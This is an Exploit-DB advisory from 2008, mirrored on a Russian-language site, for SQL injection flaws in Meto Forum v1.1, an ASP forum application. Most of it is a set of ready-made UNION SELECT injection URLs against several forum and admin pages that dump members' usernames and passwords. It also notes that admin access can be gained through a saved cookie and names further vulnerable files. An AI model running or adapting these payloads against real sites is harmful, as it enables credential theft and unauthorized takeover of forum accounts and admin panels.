- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5608
- Проверка EDB
-
- Пройдено
- Автор
- U238
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2008-2448
- Дата публикации
- 2008-05-13
Код:
-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\
Meto Forum v1.1 Multiple Remote SQL Ä°injectin Vulnerable
Script : http://www.aspindir.com/goster/5444
Risk : Forum in All users saved password is to take.
Coded : Asp , SQL Language = 'Acces'
-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\- -\-/
EÄ°P [1] Exploit:
http://localhost:2222/lab/MetoForumV1/forum/kategori.asp?kid=20+union+select+0,kullanici,2,3,4,parola,6+from+uyeler&y=SnnX%20Mesaj%20Panosu%20Test
Log in Admin Panel > cookie Saved ,
This Script file have SQL Ä°njectin atack.
http://localhost:2222/lab/MetoForumV1/forum/admin_kategori.asp?kid=1+union+select+0,1,parola,3,4,kullanici,6+from+uyeler+where+id=1 2,3,4,5,6
http://localhost:2222/lab/MetoForumV1/forum/admin/duzenle.asp?id=1+union+select+0,kullanici,parola,3,4,5,1+from+uyeler
http://localhost:2222/lab/MetoForumV1/forum/admin_oku.asp?id=1%20union%20select%200,1,2,3,4,5,1,6,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,7,8,9,1,1,1,1%20from%20uyeler
[ESP][2]
Other have sql injection atack file :
uye.asp
oku.asp
-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\- -\-
Discovered By U238 |Ugur Can Engin |
Web - Designer Developer Solutions
setuid.noexec0x1[at[hotmail[d0t]com
pgp key --> http://ugurcan.by.ru/U238.asc
Friends --> < Teyfik Cevik - ka0x - The_BekiR - Erhan Bulut - Caborz - Nettoxic - fahn - ZeberuS >
Dunyanın En buyuk Ve En Zeki Lideri Olan Mustafa Kemal Ataturk'u Selamlarım.
# milw0rm.com [2008-05-13]- Источник
- www.exploit-db.com
